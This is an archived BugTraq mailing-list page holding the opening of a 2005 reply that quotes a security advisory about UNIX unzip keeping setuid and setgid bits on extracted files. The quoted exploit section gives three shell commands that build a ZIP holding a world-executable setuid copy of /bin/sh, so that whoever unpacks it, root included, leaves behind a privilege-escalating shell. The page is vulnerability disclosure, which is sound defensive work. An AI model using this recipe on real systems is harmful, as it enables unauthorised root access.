Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista
BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
Re: 7a69Adv#22 - UNIX unzip keep setuid and setgid files Feb 28 2005 10:20PM
John Simpson (jms1 jms1 net)
On 28 Feb 2005, at 08:17, Albert Puigsech Galicia wrote:
>
> III. Exploit
>
> It's realy easy to test this vulnerability. You can create a malicious
> ZIP
> file following this example:
>
> $ cp /bin/sh .
> $ chmod 4777 sh
> $ zip malicious.zip sh
>
>
> When another user (including root) unpacks...

[ more ]  





 

Privacy Statement
Copyright 2008, SecurityFocus